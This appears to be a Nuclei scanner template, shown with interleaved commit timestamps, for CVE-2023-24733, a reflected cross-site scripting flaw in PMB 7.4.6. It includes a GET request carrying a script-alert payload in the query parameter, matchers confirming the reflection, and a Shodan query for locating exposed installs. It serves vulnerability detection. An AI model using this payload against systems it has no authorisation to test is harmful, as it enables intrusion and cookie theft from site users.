2023-03-31 11:28:24 +00:00
id : CVE-2023-24733
info :
2023-04-14 16:22:15 +00:00
name : PMB 7.4.6 - Cross-Site Scripting
2023-03-31 11:28:24 +00:00
author : r3Y3r53
severity : medium
description : |
2023-04-14 16:22:15 +00:00
PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-03-31 11:28:24 +00:00
reference :
- https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md
2023-03-31 16:11:22 +00:00
- https://github.com/AetherBlack/CVE/tree/main/PMB
2023-04-14 16:22:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-24733
2023-03-31 16:11:22 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2023-24733
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00064
cpe : cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:*
2023-03-31 11:28:24 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-03-31 11:28:24 +00:00
shodan-query : http.favicon.hash:1469328760
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : pmb_project
product : pmb
2023-03-31 11:28:24 +00:00
tags : cve,cve2023,unauth,xss,pmb
2023-04-27 04:28:59 +00:00
http :
2023-03-31 11:28:24 +00:00
- method : GET
path :
- "{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"
matchers-condition : and
matchers :
- type : word
part : body
words :
- '3@1=<script>alert(document.domain)</script>@'
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200